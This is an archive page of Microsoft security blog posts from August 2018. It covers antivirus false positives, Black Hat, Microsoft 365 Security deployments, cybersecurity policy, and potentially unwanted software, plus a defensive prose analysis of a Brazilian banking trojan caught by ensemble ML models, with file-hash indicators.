Partnering with the industry to minimize false positives

August 16th, 2018 No comments

Every day, antivirus capabilities in Windows Defender Advanced Threat Protection (Windows Defender ATP) protect millions of customers from threats. To effectively scale protection, Windows Defender ATP uses intelligent systems that combine multiple layers of machine learning models, behavior-based detection algorithms, generics, and heuristics that make a verdict on suspicious files, most of the time in a fraction of a second.

This multilayered approach allows us to proactively protect customers in real-time, whether in the form of stopping massive malware outbreaks or detecting limited sophisticated cyberattacks. This quality of antivirus capabilities is reflected in the consistently high scores that Windows Defender ATP gets in independent tests and the fact that our antivirus solution is the most deployed in the enterprise.

The tradeoff of an intelligent, scalable approach is that some of our more aggressive classifiers from time to time misclassify normal files as malicious (false positives). While false positives are a very tiny occurrence compared to the large number of malware we correctly identify (true positives) and protect customers from, we are aware of the impact that misclassified files might have. Keeping false positives at a minimum is an equally important quality metric that we continually work to improve on.

Avoiding false positives is a two-way street between security vendors and developers. Publishing apps to the Microsoft Store is the best way for vendors and developers to ensure their programs are not misclassified. For customers, apps from the Microsoft Store are trusted and Microsoft-verified.

Here are other ways developers can raise the level of trust by both security vendors and customers and help make sure programs and files are not inadvertently detected as malware.

Digitally sign files

Digital signatures are an important way to ensure the integrity of software. By verifying the identity of the software publisher, a signature assures customers that they know who provided the software theyre installing or running. Digital signatures also assure customers that the software they received is in the same condition as when the publisher signed it and the software has not been tampered with.

Code signing does not necessarily guarantee the quality or functionality of software. Digitally signed software can still contain flaws or security vulnerabilities. However, because software vendors reputations are based on the quality of their code, there is an incentive to fix these issues.

We use the reputation of digital certificates to help determine the reputation of files signed by them. The reverse is also true: we use the reputation of digitally signed files to determine the reputation of the digital certificates they are signed with. One of the most effective ways for developers to reduce the chances of their software being detected as malware is it to digitally sign files with a reputable certificate.

The second part of reducing the risk of unintended detection is to build a good reputation on that certificate. Microsoft uses many factors to determine the reputation of a certificate, but the most important are the files that are signed by it. If all the files using a certificate have good reputation and the certificate is valid, then the certificate keeps a good reputation.

Extended validation (EV) code signing is a more advanced version of digital certificates and requires a more rigorous vetting and authentication process. This process requires a more comprehensive identity verification and authentication process for each developer. The EV code signing certificates require the use of hardware to sign applications. This hardware requirement is an additional protection against theft or unintended use of code signing certificates. Programs signed by an EV code signing certificate can immediately establish reputation with Windows Defender ATP even if no prior reputation exists for that file or publisher.

Keep good reputation

To gain positive reputation on multiple programs and files, developers sign files with a digital certificate with positive reputation. However, if one of the files gains poor reputation (e.g., detected as malware) or if the certificate was stolen and used to sign malware, then all of the files that are signed with that certificate will inherit the poor reputation. This situation could lead to unintended detection. This framework is implemented this way to prevent the misuse of reputation sharing.

We thus advise developers to not share certificates between programs or other developers. This advice particularly holds true for programs that incorporate bundling or use advertising or freemium models of monetization. Reputation accruesif a software bundler includes components that have poor reputation, the certificate that bundler is signed with gets the poor reputation.

Be transparent and respect users ability to choose

Malware threats use a variety of techniques to hide. Some of these techniques include file obfuscation, being installed in nontraditional install locations, and using names that dont reflect that purpose of the software.

Customers should have choice and control over what happens on their devices. Using nontraditional install locations or misleading software names reduce user choice and control.

Obfuscation has legitimate uses, and some forms of obfuscation are not considered malicious. However, many techniques are only employed to evade antivirus detection. Developers should refrain from using non-commercial packers and obfuscation software.

When programs employ malware-like techniques, they trigger flags in our detection algorithms and greatly increase the chances of false positives.

Keep good company

Another indicator that can influence the reputation of a file are the other programs the file is associated with. This association can come from what the program installs, what is installed at the same time as the program, or what is seen on the same machines as the file. Not all of these associations directly lead to detections, however, if a program installs other programs or files that have poor reputation, then by association that program gains poor reputation.

Understand the detection criteria

Microsofts policy aims to protect customers against malicious software while minimizing the restrictions on developers. The diagram below demonstrates the high-level evaluation criteria Microsoft uses for classifying files:

  • Malicious software: Performs malicious actions on a computer
  • Unwanted software: Exhibits the behavior of adware, browser modifier, misleading, monitoring tool, or software bundler
  • Potentially unwanted application (PUA): Exhibits behaviors that degrade the Windows experience
  • Clean: We trust the file is not malicious, is not inappropriate for an enterprise environment, and does not degrade the Windows experience

These evaluation criteria describe the characteristics and behavior of malware and potentially unwanted applications and guide the proper identification of threats. Developers should make sure their programs and files dont demonstrate undesirable characteristics or behavior to minimize chances their programs are not misclassified.

Challenging a detection decision

If you follow these pieces of advice and we unintentionally detect your file, you can help us fix the issue by reporting it through the Windows Defender Security Intelligence portal.

Customer protection is our top priority. We deliver this through Windows Defender ATPs unified endpoint security platform. Helping Microsoft maintain high-quality protection benefits customers and developers alike, allowing for an overall productive and secure computing experience.

 

 

Michael Johnson

Windows Defender Research

 

 

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

Categories: cybersecurity, Tips & Talk Tags:

Finding the signal of community in all the noise at Black Hat

August 16th, 2018 No comments

I dont know about you, but I find large conferences overwhelming. Dont get me wrong, nothing beats the innovative potential of bringing a diverse group of brilliant people together to hash through thorny issues and share insights. But there are so many speakers, booths, and people, it can be a challenge to find the signal in all the noisedid I mention conferences are also really loud?

So last week when I stepped into the first of multiple showrooms at the Mandalay Hotel in Las Vegas for the Black Hat Briefing, I have to admit I felt a little nostalgia for the very first Black Hat Conference. It was 1997 at the old Aladdin Casino in Las Vegas. A casino with a long and colorful history, slated to close a few months after the conference ended. 1997: That was before Facebook and the iPhone, before the cloud. At the time, the RSA Conference was still mostly focused on cryptography, and those of us concerned about security vulnerabilities and how they impacted practitioners day in and day out had few opportunities to just get together and talk. The first Black Hat Briefing was very special. If my memory serves, there were only a couple hundred of us in attendancecompared to thousands todayand through those connections we built a community and an industry.

Building a community was key to creating the information security industry that exists today, and I believe that building community is just as critical now as we face down the new security threats of a cloud-and-edge world, an IoT world. We need the whole defender communitywhite hat hackers, industry, and governmentworking together to protect the security of our customers.

The security research community plays a fundamental role in community-based defense

Over the last few years, Microsoft has been expanding and redefining what makes up our security communityone of the many positive evolutions since that first Black Hat. Like most tech companies, we once believed that any hacker outside of the organization posed a risk, but as weve gotten to know each other through many years of hard-earned trust and collaboration, we, and the security research community, have learned that our values arent so different. Sometimes the only way to make something stronger is to break it. We know we cant on our own find all the gaps and errors in code that lead to vulnerabilities that criminals exploit to steal money and data. We need great minds both inside and outside our organization. Many of those great minds in the security research community collaborate with us through the Microsoft Security Response Center, and Black Hat was the perfect place to announce the subset of those researchers that made our annual Top 100 Security Researchers List.

Image of the Top 100 sign at the Black Hat Conference.

 

We really appreciate the ongoing support from the community and encourage new researchers to report vulnerabilities to the Microsoft Security Response Center and participate in the Microsoft Bounty Program.

It takes a community to protect the security of our customers

As much as Microsoft values the relationship we have with researchers, we also attended Black Hat as industry partners. We want to help educate our peers on notable vulnerabilities and exploits, and share knowledge following major security events. As an example, one of our sessions focused on how Spectre and Meltdown are a wake-up call on multiple dimensions: how we engineer, how we partner, how we react when we find new security vulnerabilities, and how we need to become more coordinated. When I think about what was so exciting about that first conference, this is what comes to mind: those moments when we hear what our partners have learned, share what we know, and build on those insights to strengthen our collective response. The tech industry is increasingly interdependent. Its going to take all of us working together to protect the safety and security of our customers devices and data.

Image of the Black Hat Conference in Las Vegas.

 

But the meeting of the minds at annual security conferences, while important, is not enough. Microsoft also believes that we need a more structured approach to our collaboration. Cybersecurity is not just about threats from hackers and criminal groups; it has increasingly become a situation where we’re facing a cyberweapons arms race with governments attacking users around the world. We know this is a challenge we must pursue with our partners and customers, with a sense of shared responsibility and a focus on constantly making it easier for everyone to benefit from the latest in security advances. Microsoft has been working to help organize the industry in pursuit of this goal.

This past April during the RSA Conference, we came together as initially 34 companies, now 44 companies, and agreed to a new Cybersecurity Tech Accord. In this accord, we all pledge to help protect every customer, regardless of nationality, and will refrain from helping governments attack innocent civilians. It’s a foundationon which we are buildingto take coordinated action and to work with all our partners and many others to strengthen the resilience of the ecosystem for all our customers.

I admit it, I do sometimes miss attending those small, tightly knit conferences of old. But Im even more inspired about the possibilities that I see as we continue to build on these collaborative models. Weve seen a lot of progress recently working with our partners and the security research community. If you listen closely, I think you can hear the signal breaking through.

How Microsoft 365 Security integrates with your broader IT ecosystem—part 3

August 14th, 2018 No comments

Todays post was coauthored by Debraj Ghosh, Senior Product Marketing Manager, and Diana Kelley, Cybersecurity Field CTO.

Customer satisfaction is one of the most important goals for Microsoft 365 Security. In part 1 of this series, we discussed Microsofts overall security strategy for connecting with the broader security community, and in part 2, we looked at how Microsoft services help secure non-Microsoft services of an organizations IT environment.

In the final part of this blog series, we highlight how Microsoft 365 Security solutions work together to help customers secure their IT environments. The benefits of Microsoft 365 Security services are universal, as demonstrated by the fact that our customers are large and small, and focused on different industry verticals across the globe.

Helping enable a mobile workforce at a healthcare network

Sutter Health is a not-for-profit network of healthcare professionals and hospitals serving Northern California. CTO Wes Wrights main goal is to provide IT and software solutions that allow employees to maximize their time spent on patient and family care. Sutter Healths network employs nearly 52,000 people, supporting 24 acute care hospitals and care centers, serving more than 100 communities. Sutter has an ecosystem of 65,000 mobile devices and modernizing IT was not trivial for them. They deployed Microsoft Intune to help manage and support an internal app store called the Sutter Intune Store. Intune also helps ensure Sutters clinical and business partners can access and use Sutter Health authorized apps from anywhere, at any time. Their Intune-powered solution is designed to:

  • Manage and secure any mobile device used by the workforce to access company data.
  • Manage and secure the mobile apps used by their workforce.
  • Protect company information even after it is accessed.
  • Ensure devices and apps are compliant with company security policies.

With services like Intune (Figure 1), simplifying security management and reducing IT complexity, Sutter Health can support the latest devices, embrace modern apps, leverage a distributed workforce, and deliver the highest quality patient care.

Figure 1. The Intune architecture diagram.

Enhancing productivity through security at a power company

Wrtsil is a Finnish company manufacturing and servicing power sources and other equipment for the marine and energy markets. Joachim Kjellman, solutions manager at Wrtsil was looking for a solution with conditional access and multifactor authentication (MFA) capabilities. He selected Azure Active Directory (Azure AD), which enables single sign-on capability for all company resources anywhere with internet access, removing the need of unreliable VPN connections. Additionally, with Conditional Access, Wrtsil can provide remote access to apps that can be secured with MFA and managed when originating from unmanaged devices.Azure AD (Figure 2) is designed to help organizations:

  • Provide seamless access.
  • Facilitate collaboration.
  • Unlock IT efficiencies.
  • Enhance security and compliance.

Figure 2. Azure AD overview.

Azure AD also supports seamless collaboration (even on large-scale, complex projects) between Wrtsil and its contractors and partners. Azure AD B2B collaboration features ensure that access to shared resources is heavily protected. Azure AD has helped Wrtsil IT staffers save time and money, enabling Wrtsil to remain focused on serving their global customer base.

Securing an entire IT environment at a transportation firm

Throughout this series, we have discussed how Microsoft 365 Security services integrate well with the myriad IT solutions our customers utilize. However, some of our customers chose Microsoft 365 Security services to help secure their entire environment. HS1 Limited operates and maintains infrastructure for the high-speed railway connecting St. Pancras International Station in London and the Channel Tunnel, joining international high-speed routes between London, Paris, and Brussels, along with several domestic routes. The 50-person firm works with hundreds of counterparts and vendors, so security and collaboration are high priorities. Shawn Marcellin, IT and facilities manager at HS1 Limited needed a highly secure, collaborative solution without investing in a full datacenter and turned to Microsoft 365 E5. Marcellin adopted Microsoft 365 E5 for its advanced security features, including Windows Defender Advanced Threat Protection, Office 365 Advanced Threat Protection, and Office 365 Threat Intelligence. Identity management through Microsoft Azure Active Directory Premium P2 was another advantage of his choosing Microsoft 365 E5protecting data with Microsoft Cloud App Security and Office 365 Advanced Threat Protection. Marcellin is confident that the move to a total cloud-based, secure solution will continue to benefit HS1 Limited.

Figure 3. The entire Microsoft 365 Security reference architecture.

To learn more about how Microsoft security solutions fit together, read Cybersecurity Reference Architecture: Security for a Hybrid Enterprise.

Digging deeper

These are only a few examples of organizations using Microsoft 365 Security services to secure their extended or entire IT ecosystem. We encourage you to visit the Microsoft Secure site and learn more about the full scope of Microsoft 365 Security capabilities. Also, check out more customer stories to learn how organizations leverage Microsoft 365 Security.

To get started envisioning a plan, onboarding, and driving user adoption, go to FastTrack.microsoft.com, sign in with your subscription ID, and complete the Request for Assistance Form.

Thanks for reading this series. We hope you will try the services discussed in this blog to start benefitting from their capabilities, which include:

Categories: cybersecurity Tags:

Cybersecurity threats: How to discover, remediate, and mitigate

August 13th, 2018 No comments

Image of four hands collaborating over a drawing of a lightbulb.

This blog is part of a series that responds to common questions we receive from customers about deployment of Microsoft 365 security solutions. In this series youll find context, answers, and guidance for deployment and driving adoption within your organization. Check out our last blog, Protect your data in files, apps, and devices.

Constantly evolving threats to your company data can cause even the most conscientious employee to unknowingly open infected files or click on malicious web links. Security breaches are inevitable. You need to discover threats quickly, remediate immediately, and mitigate the impact of malware and breaches.

Many common types of threats target attack vectors such as email, network endpoints, and user credentials. In this blog, we explain how Microsoft 365 threat protection solutions interoperate threat detection across these attack vectors (Figure 1).

Figure 1. Threat detection interoperates across Microsoft 365.

Protect identities: Azure Active Directory (Azure AD) and Azure Advanced Threat Protection (Azure ATP)

Azure ATP provides end-to-end network security by protecting user identities and credentials in stored in Azure Active Directory. To prevent identity credential attacks, Azure AD conditional access detects risk events, such as users with leaked credentials, sign-ins from anonymous IP addresses, impossible travel to atypical locations, infected devices, and IP addresses with suspicious activity or unfamiliar locations.

Azure ATP detects suspicious activities across the network attack surface, such as:

  • Reconnaissance work, during which attackers gather information on how the environment is built, what the different assets are, and which entities exist.
  • Lateral movement cycles, during which attackers invest time and effort in spreading their attack deeper inside your network.
  • Domain dominance (persistence), during which attackers capture the information, allowing them to resume their campaign using various sets of entry points, credentials, and techniques.

These services that protect specific parts of the attack surface can also share signals to alert services protecting other surfaces of the enterprise.

Azure ATP detects these suspicious activities and surfaces the information, including a clear view of who, what, when, and how, in the Azure ATP workspace portal, which can be accessed by signing in to your Azure AD user account.

Protect email: Microsoft Office 365 Advanced Threat Protection (Office 365 ATP)

Threat protection for Office 365 begins with Microsoft Exchange Online Protection, which provides protection against all known malicious links and malware. Office 365 ATP builds on this protection by offering holistic and ongoing protection across your Office 365 environment, including email and business apps, by securing user mailboxes, business-critical files, and online storage against malware campaigns in real-time.

Office 365 ATP Safe Links helps protect your environment by offering time-of-click protection from malicious links. If a link is unsafe, the user is warned not to visit the site or informed that the site has been blocked. Office 365 ATP and Exchange Online Protection can be configured in the Office 365 admin center.

Protect endpoints: Windows Defender Advanced Threat Protection (Windows Defender ATP)

For endpoint attacks, Windows Defender ATP provides near-instant detection and blocking of new and emerging threats using advanced file and process behavior monitoring and other heuristic solutions. These endpoint sensors collect and process behavioral signals from the operating system, which are then translated into insights, detections, and recommended responses to advanced threats. Windows Defender ATP offers dedicated protection updates based on machine learning, human and automated big-data analyses, and in-depth threat resistance research to identify attacker tools, techniques, and procedures, and to generate alerts when these are observed in collected sensor data.

Microsoft Device Guard is a feature of Windows 10 that provides increased security against malware and zero-day attacks by blocking anything other than trusted apps. Device Guard is managed in Microsoft System Center Configuration Manager (ConfigMgr).

Deployment tips from the experts

Now that you know more about how Microsoft 365 security solutions can protect your data, here are several proven tips to put it all into action.

Consider the key attack vectors. Devices, email, network, and identity credentials are the most common areas for cybersecurity attacks. To help secure these vectors:

Plan for success with FastTrack. This valuable service comes with your subscription at no additional charge. Whether youre planning your initial rollout, needing to onboard your product, or driving end-user adoption, FastTrack is your benefit service that is ready to assist you. Get started at FastTrack for Microsoft 365.

Want to learn more?

For more information and guidance on this topic, stay tuned for the white paper Discover threats quickly, remediate immediately, and mitigate the impact of malware and breaches coming soon!

More blog posts from this series:

Categories: cybersecurity Tags:

Protecting the protector: Hardening machine learning defenses against adversarial attacks

Harnessing the power of machine learning and artificial intelligence has enabled Windows Defender Advanced Threat Protection (Windows Defender ATP) next-generation protection to stop new malware attacks before they can get started often within milliseconds. These predictive technologies are central to scaling protection and delivering effective threat prevention in the face of unrelenting attacker activity.

Consider this: On a recent typical day, 2.6 million people encountered newly discovered malware in 232 different countries (Figure 1). These attacks were comprised of 1.7 million distinct, first-seen malware and 60% of these campaigns were finished within the hour.

Figure 1. A single day of malware attacks: 2.6M people from 232 countries encountering malware

While intelligent, cloud-based approaches represent a sea change in the fight against malware, attackers are not sitting idly by and letting advanced ML and AI systems eat their Bitcoin-funded lunch. If they can find a way to defeat machine learning models at the heart of next-gen AV solutions, even for a moment, theyll gain the breathing room to launch a successful campaign.

Today at Black Hat USA 2018, in our talk Protecting the Protector: Hardening Machine Learning Defenses Against Adversarial Attacks, we presented a series of lessons learned from our experience investigating attackers attempting to defeat our ML and AI protections. We share these lessons in this blog post; we use a case study to demonstrate how these same lessons have hardened Microsofts defensive solutions in the real world. We hope these lessons will help provide defensive strategies on deploying ML in the fight against emerging threats.

Lesson: Use a multi-layered approach

In our layered ML approach, defeating one layer does not mean evading detection, as there are still opportunities to detect the attack at the next layer, albeit with an increase in time to detect. To prevent detection of first-seen malware, an attacker would need to find a way to defeat each of the first three layers in our ML-based protection stack.

Figure 2. Layered ML protection

Even if the first three layers were circumvented, leading to patient zero being infected by the malware, the next layers can still uncover the threat and start protecting other users as soon as these layers reach a malware verdict.

Lesson: Leverage the power of the cloud

ML models trained on the backend and shipped to the client are the first (and fastest) layer in our ML-based stack. They come with some drawbacks, not least of which is that an attacker can take the model and apply pressure until it gives up its secrets. This is a very old trick in the malware authors playbook: iteratively tweak prospective threats and keep scanning it until its no longer detected, then unleash it.

Figure 3. Client vs. cloud models

With models hosted in the cloud, it becomes more challenging to brute-force the model. Because the only way to understand what the models may be doing is to keep sending requests to the cloud protection system, such attempts to game the system are out in the open and can be detected and mitigated in the cloud.

Lesson: Use a diverse set of models

In addition to having multiple layers of ML-based protection, within each layer we run numerous individual ML models trained to recognize new and emerging threats. Each model has its own focus, or area of expertise. Some may focus on a specific file type (for example, PE files, VBA macros, JavaScript, etc.) while others may focus on attributes of a potential threat (for example, behavioral signals, fuzzy hash/distance to known malware, etc.). Different models use different ML algorithms and train on their own unique set of features.

Figure 4. Diversity of machine learning models

Each stand-alone model gives its own independent verdict about the likelihood that a potential threat is malware. The diversity, in addition to providing a robust and multi-faceted look at potential threats, offers stronger protection against attackers finding some underlying weakness in any single algorithm or feature set.

Lesson: Use stacked ensemble models

Another effective approach weve found to add resilience against adversarial attacks is to use ensemble models. While individual models provide a prediction scoped to a particular area of expertise, we can treat those individual predictions as features to additional ensemble machine learning models, combining the results from our diverse set of base classifiers to create even stronger predictions that are more resilient to attacks.

In particular, weve found that logistic stacking, where we include the individual probability scores from each base classifier in the ensemble feature set provides increased effectiveness of malware prediction.

Figure 5. Ensemble machine learning model with individual model probabilities as feature inputs

As discussed in detail in our Black Hat talk, experimental verification and real-world performance shows this approach helps us resist adversarial attacks. In June, the ensemble models represented nearly 12% of our total malware blocks from cloud protection, which translates into tens of thousands of computers protected by these new models every day.

Figure 6. Blocks by ensemble models vs. other cloud blocks

Case study: Ensemble models vs. regional banking Trojan

“The idea of ensemble learning is to build a prediction model by combining the strengths of a collection of simpler base models.”
— Trevor Hastie, Robert Tibshirani, Jerome Friedman

One of the key advantages of ensemble models is the ability to make a high-fidelity prediction from a series of lower-fidelity inputs. This can sometimes seem a little spooky and counter-intuitive to researchers, but uses cases weve studied show this approach can catch malware that the singular models cannot. Thats what happened in early June when a new banking trojan (detected by Windows Defender ATP as TrojanDownloader:VBS/Bancos) targeting users in Brazil was unleashed.

The attack

The attack started with spam e-mail sent to users in Brazil, directing them to download an important document with a name like Doc062108.zip inside of which was a document that is really a highly obfuscated .vbs script.

Figure 7. Initial infection chain

Figure 8. Obfuscated malicious .vbs script

While the script contains several Base64-encoded Brazilian poems, its true purpose is to:

  • Check to make sure its running on a machine in Brazil
  • Check with its command-and-control server to see if the computer has already been infected
  • Download other malicious components, including a Google Chrome extension
  • Modify the shortcut to Google Chrome to run a different malicious .vbs file

Now whenever the user launches Chrome, this new .vbs malware instead runs.

Figure 9. Modified shortcut to Google Chrome

This new .vbs file runs a .bat file that:

  • Kills any running instances of Google Chrome
  • Copies the malicious Chrome extension into %UserProfile%\Chrome
  • Launches Google Chrome with the load-extension= parameter pointing to the malicious extension

Figure 10. Malicious .bat file that loads the malicious Chrome extension

With the .bat files work done, the users Chrome instance is now running the malicious extension.

Figure 11. The installed Chrome extension

The extension itself runs malicious JavaScript (.js) files on every web page visited.

Figure 12. Inside the malicious Chrome extension

The .js files are highly obfuscated to avoid detection:

Figure 13. Obfuscated .js file

Decoding the hex at the start of the script, we can start to see some clues that this is a banking trojan:

Figure 14. Clues in script show its true intention

The .js files detect whether the website visited is a Brazilian banking site. If it is, the POST to the site is intercepted and sent to the attackers C&C to gather the users login credentials, credit card info, and other info before being passed on to the actual banking site. This activity is happening behind the scenes; to the user, theyre just going about their normal routine with their bank.

Ensemble models and the malicious JavaScript

As the attack got under way, our cloud protection service received thousands of queries about the malicious .js files, triggered by a client-side ML model that considered these files suspicious. The files were highly polymorphic, with every potential victim receiving a unique, slightly altered version of the threat:
Figure 15. Polymorphic malware

The interesting part of the story are these malicious JavaScript files. How did our ML models perform detecting these highly obfuscated scripts as malware? Lets look at one of instances. At the time of the query, we received metadata about the file. Heres a snippet:

Report time 2018-06-14 01:16:03Z
SHA-256 1f47ec030da1b7943840661e32d0cb7a59d822e400063cd17dc5afa302ab6a52
Client file type model SUSPICIOUS
File name vNSAml.js
File size 28074
Extension .js
Is PE file FALSE
File age 0
File prevalence 0
Path C:\Users\<user>\Chrome\1.9.6\vNSAml.js
Process name xcopy.exe

Figure 16 File metadata sent during query to cloud protection service

Based on the process name, this query was sent when the .bat file copied the .js files into the %UserProfile%\Chrome directory.

Individual metadata-based classifiers evaluated the metadata and provided their probability scores. Ensemble models then used these probabilities, along with other features, to reach their own probability scores:

Model Probability that file is malware
Fuzzy hash 1 0.01
Fuzzy hash 2 0.06
ResearcherExpertise 0.64
Ensemble 1 0.85
Ensemble 2 0.91

Figure 17. Probability scores by individual classifiers

In this case, the second ensemble model had a strong enough score for the cloud to issue a blocking decision. Even though none of the individual classifiers in this case had a particularly strong score, the ensemble model had learned from training on millions of clean and malicious files that this combination of scores, in conjunction with a few other non-ML based features, indicated the file had a very strong likelihood of being malware.

Figure 18. Ensemble models issue a blocking decision

As the queries on the malicious .js files rolled in, the cloud issued blocking decisions within a few hundred milliseconds using the ensemble models strong probability score, enabling Windows Defender ATPs antivirus capabilities to prevent the malicious .js from running and remove it. Here is a map overlay of the actual ensemble-based blocks of the malicious JavaScript files at the time:

Figure 19. Blocks by ensemble model of malicious JavaScript used in the attack

Ensemble ML models enabled Windows Defender ATPs next-gen protection to defend thousands of customers in Brazil targeted by the unscrupulous attackers from having a potentially bad day, while ensuring the frustrated malware authors didnt hit the big pay day they were hoping for. Bom dia.

 

Further reading on machine learning and artificial intelligence in Windows Defender ATP

Indicators of compromise (IoCs)

  • Doc062018.zip (SHA-256: 93f488e4bb25977443ff34b593652bea06e7914564af5721727b1acdd453ced9)
  • Doc062018-2.vbs (SHA-256: 7b1b7b239f2d692d5f7f1bffa5626e8408f318b545cd2ae30f44483377a30f81)
  • zobXhz.js 1f47(SHA-256: ec030da1b7943840661e32d0cb7a59d822e400063cd17dc5afa302ab6a52)

 

 

 

Randy Treit, Holly Stewart, Jugal Parikh
Windows Defender Research
with special thanks to Allan Sepillo and Samuel Wakasugui

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

Categories: cybersecurity Tags:

Building on experience: a framework for cybersecurity policy

August 9th, 2018 No comments

Each year, more and more governments are developing policies to address security challenges presented by an increasingly digitized world. And to support those efforts, Im excited today to announce the release of Microsofts new Cybersecurity Policy Framework, a resource for policymakers that provides an overview of the building blocks of effective cybersecurity policies and that is aligned with the best practices from around the globe. Nations coming online today, and building their cybersecurity infrastructures, should notand need notbe burdened with the stumbling blocks that characterized previous generations of cybersecurity policies. Instead, such nations should be empowered to leapfrog outdated challenges and unnecessary hurdles.

For years, Microsoft has worked with policymakers in advanced and emerging economies, and across many social and political contexts, to support the development of policies to address a wide range of cybersecurity challenges. This new publication captures and distills the important lessons learned from those years of experience partnering with governments. And as increasing numbers of countries wrestle with how to best address cybersecurity challenges, the Cybersecurity Policy Framework is an indispensable resource for the policymakers joining this work.

According to the last analysis provided by the United Nations, half of the countries on earth today either have or are developing national cybersecurity strategies. I have little doubt that in the next decade every single outstanding country will add its name to that list. And this trend highlights the importance of this new resource. The policies established today will impact how technologies are used for years to come and how safe or dangerous the online world becomes for all of us. Truly, there is no going back, only forward.

The Cybersecurity Policy Framework is not one-stop shopping for cybersecurity policymakers, but it does serve as an important umbrella document, providing a high-level overview of concepts and priorities that must be top of mind when developing an effective and resilient cybersecurity policy environment.

Specifically, this new resource outlines:

  • National strategies for cybersecurity.
  • How to establish a national cyber agency.
  • How to develop and update cybercrime laws.
  • How to develop and update critical infrastructure protections.
  • International strategies for cybersecurity.

We at Microsoft have been at this work for a long time and have developed a wide variety of resources to help those who are working to position their industries and nations to capitalize on the benefits of new technologiesso many that they can often be difficult to find! And this highlights another strength of the Cybersecurity Policy Framework, while it is not one-stop shopping, each section does provide an overview of a critical policy topic as well as links to the associated and more in-depth resources my team has developed over the years to assist policymakers. In this way, this new resource serves not only as essential, high-level guidance, but also as a key to a broader catalogue of resources built on years of experience partnering with governments around the world.

Reading through this new resource, I am proud of the work we have done in pursuit of a safer online world. Important progress has been made and these foundational principles underscore much todays cybersecurity discourse. However, we haveand will always havemore work to do as a result of the changes and innovations in technology always on the horizon, and their implications for cybersecurity. Im glad to put this resource forward today to support a new generation of policymakers and also look forward to partnering with them to tackle the new challenges we will face together tomorrow.

Download your copy of the Cybersecurity Policy Framework today.

Categories: Cybersecurity Policy Tags:

Protecting the modern workplace from a wide range of undesirable software

Security is a fundamental component of the trusted and productive Windows experience that we deliver to customers through modern platforms like Windows 10 and Windows 10 in S mode. As we build intelligent security technologies that protect the modern workplace, we aim to always ensure that customers have control over their devices and experiences.

To protect our customers from the latest threats, massive amounts of security signals and threat intelligence from the Microsoft Intelligent Security Graph are processed by security analysts and intelligent systems that identify malicious and other undesirable software. Our evaluation criteria describe the characteristics and behavior of malware and potentially unwanted applications and guide the proper identification of threats. This classification of threats is reflected in the protection delivered by the Windows Defender Advanced Threat Protection (Windows Defender ATP) unified endpoint security platform.

Malware: Malicious software and unwanted software

Among the big classifications of threats, customers may be most familiar with malicious software. Malicious software might steal personal information, lock devices until a ransom is paid, use devices to send spam, or download other malicious software. Examples of these types of threats are keyloggers and ransomware. Malware can get into devices through various infection vectors, including exploits, which undermine users choice and control of their devices. Windows Defender ATP’s next generation protections detect and block these malicious programs using local machine learning models, behavior-based detection, generics and heuristics, and cloud-based machine learning models and data analytics.

Some threats, on the other hand, are classified as unwanted software. These are applications that dont keep customers in control of devices through informed choices and accessible controls are considered unwanted. Examples of unwanted behavior include modifying browsing experience without using supported browser extensibility models, using alarming and coercive messages to scare customers into buying premium versions of software, and not providing a clear and straightforward way to install, uninstall or disable applications. Like malicious software, unwanted software threats are malware.

Using a model that leverages predictive technologies, machine learning, applied science, and artificial intelligence powers Windows Defender ATP to detect and stop malware at first sight, as reflected in consistently high scores in independent antivirus tests.

Potentially unwanted applications

Some applications do not exhibit malicious behavior but can adversely impact the performance or use of devices. We classify these as potentially unwanted applications (PUA). For example, we noted the increased presence of legitimate cryptocurrency miners in enterprise environments. While some forms of cryptocurrency miners are not malicious, they may not be authorized in enterprise networks because they consume computing resources.

Unlike malicious software and unwanted software, potentially unwanted applications are not malware. Enterprise security administrators can use the PUA protection feature to block these potentially unwanted applications from downloading and installing on endpoints. PUA protection is enabled by default in Windows Defender ATP when managed through System Center Configuration Manager.

In March 2018, we started surfacing PUA protection definitions on VirusTotal. We have also updated our evaluation criteria page to describe the specific categories and descriptions of software that we classify as PUA. These are:

Browser advertising software: Software that displays advertisements or promotions or prompts the user to complete surveys for other products or services in software other than itself. This includes, for example, software that inserts advertisements in browser webpages.

Torrent software: Software that is used to create or download torrents or other files specifically used with peer-to-peer file-sharing technologies.

Cryptomining software: Software that uses your computer resources to mine cryptocurrencies.

Bundling software: Software that offers to install other software that is not digitally signed by the same entity. Also, software that offers to install other software that qualify as PUA based on the criteria outlined in this document.

Marketing software: Software that monitors and transmits the activities of the user to applications or services other than itself for marketing research.

Evasion software: Software that actively tries to evade detection by security products, including software that behaves differently in the presence of security products.

Poor industry reputation: Software that trusted security providers detect with their security products. The security industry is dedicated to protecting customers and improving their experiences. Microsoft and other organizations in the security industry continuously exchange knowledge about files we have analyzed to provide users with the best possible protection.

Customer protection is our top priority. Windows Defender Advanced Threat Protection (Windows Defender ATP) incorporates next-generation protection, attack surface reduction, endpoint detection and response, and automated investigation and remediation, and advanced hunting capabilities. We adjust, expand, and update our evaluation criteria based on customer feedback as well as new and emerging trends in the threat landscape. We encourage customers to help us identify new threats and other undesirable software by submitting programs that exhibit behaviors outlined in the evaluation criteria.

 

 

Michael Johnson

Windows Defender Research

 

 

 

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

Attending Black Hat USA 2018? Here’s what to expect from Microsoft.

Black Hat USA 2018 brings together professionals at all career levels, encouraging growth and collaboration among academia, world-class researchers, and leaders in the public and private sectors. This is an exciting time as our Microsoft researchers, partners, and security experts will showcase the latest collaborations in defense strategies for cybersecurity, highlight solutions for security vulnerabilities in applications, and bring together an ecosystem of intelligent security solutions. Our objective is to arm business, government, and consumers with deeply integrated intelligence and threat protection capabilities across platforms and products.

